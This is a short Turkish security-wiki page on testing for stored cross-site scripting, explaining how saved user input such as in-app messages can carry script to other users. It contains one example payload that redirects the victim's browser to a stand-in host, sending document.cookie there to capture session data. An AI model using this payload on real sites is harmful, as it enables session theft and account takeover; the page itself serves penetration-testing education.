Depolanmış (Stored) XSS Testleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Depolanmış XSS zafiyetinden faydalanılarak kullanıcıların tarayıcılarında hedef sistem üzerinden kod çalıştırmak.

Araçlar:

  • Firefox

Adımlar:

  • Hedef uygulamada girdi noktalarından girilen değerlerin daha sonra başka ekranda gösterilmek veya sayfanın bir yerinde kullanılmak amacıyla kaydedildiği durumlar aranır.
  • Örneğin uygulamanın kendi içindeki mesajlaşmasında gerekli arındırma (sanitizing) işlemleri yapılmadıysa bir kullanıcı başka bir kullanıcıya;
<script>document.location=”cookiekaydet.com/kaydet.php?val”=+document.cookie</script>

gibi zararlı kodlar içeren mesajlar gönderilerek kullanıcıların oturum bilgileri ele geçirilebilir veya kullanıcılar istemleri dışında başka sayfalara yönlendirilebilir. Hatta kullanıcıların tarayıcıları üzerinden kişisel bilgisayarlarına daha ileri saldırılar yapılabilir.

Kaynak:[değiştir]

  • XSS Attacks - Cross Site Scripting Exploits & Defense